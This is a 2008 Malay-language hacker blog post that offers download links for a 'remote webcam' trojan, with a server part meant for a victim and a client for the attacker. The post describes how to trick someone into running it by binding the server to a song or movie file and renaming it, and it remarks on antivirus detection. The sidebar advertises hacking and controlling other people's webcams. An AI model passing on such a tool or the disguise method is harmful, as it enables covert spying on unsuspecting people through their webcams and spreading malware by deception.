80RN 70 83 l-l4CK3R
Laman ini direka khusus bg memudahkan pelayar2 internet yg berminat perihal dunia hackers dan booters utk mencari sedikit sebanyak pengalaman dan pengetahuan disini.Mngkin ramai diluar sana yg merasa sukar utk menemui laman hack atau info mengenainya.Kerna itulah laman ini dicipta.Utk keterangan lanjut,anda boleh melawati link2 yg saya sediakan disini.Diharap info2 serta tutorial yg ada dihalaman ini dpt membantu anda.Juga anda boleh menilai sejauh mana kekebalan sistem sekuriti pada sistem anda dan apa yg mampu dilakukan oleh hackers terhadap sistem anda.Laman ini akan dikemaskini dr masa ke semasa dgn memasukkan elemen2 yg berkaitan.Bg setiap komen atau cadangan anda boleh e-mail trus kepada s_atkong@yahoo.com(pahang:2 chatter)
satkong music
i know what u did
How To Boot:plizz respect each other
supported by












































































visitors
remote webcam (mari skodeng)
Wednesday, August 6, 2008



ni 1 lg program yg pnuh ngan virus(yg ni trojan)...harap maklum..sumer hack tools/program mengandungi virus(kalu xder virus x jd keje).yg beza cm tahap virus tu samaada coding nyer mudah dikesan oleh AV atau sukar dikesan.ada yg 99% undetectable..cth :heaven gates/real vnc.
tp yg remote webcam ni mmg 99%detectable..kalu nasib korg baik..minah ke mamat tu x update AV or AV chokia..x detect la.
yg server tu korg leh send kat org tu(mangsa)...remote tu install dlm pc korg.
tp kalu korg exploit mangsa tu(perdaya mngsa tuk klik server tu)ada cara dia
psl aku bese wat dlsetan.bind kan server tu ngan mana2 file yg korg nk guna file binder.
cth:korg bind kan dgn lagu ke movie ke...dan rename server tu ke nama lagu/movie tu..pas2 send.
aku x pnh try software ni..tp aku pnh try software len yg sama je lbih kurg dgn yg ni...dan mmg jd.yg ni aku x test lg...tp sumer basic hack prgram lbih kurg sama...
sekian.
*last warning: hati2 kawan...program ni mmg ada trojan.kalu x sanggup..jgn download(aku x tanggungjawab)gile

server--http://www.2shared.com/file/1835922/c25b043d/remote_webcam_server.html
remote--http://www.2shared.com/file/1835916/ee1b93e7/remote_webcam_cliente.html

__\m/(>_<)\m/__
posted by Satkong@Underground @ 5:12 PM  
test
0 Comments:
Post a Comment
<< Home
 
About Me

Name: Satkong@Underground
Home: kuantan, pahang, Malaysia
About Me:
See my complete profile
Previous Post
For All Booters n Hackerz USE AT UR OWN RISK
other sites
h4ck world's private web cams and control it
my prenz blog
upload by me
© 2005 satkong@underground Blogspot Template by d4rkk1ll3r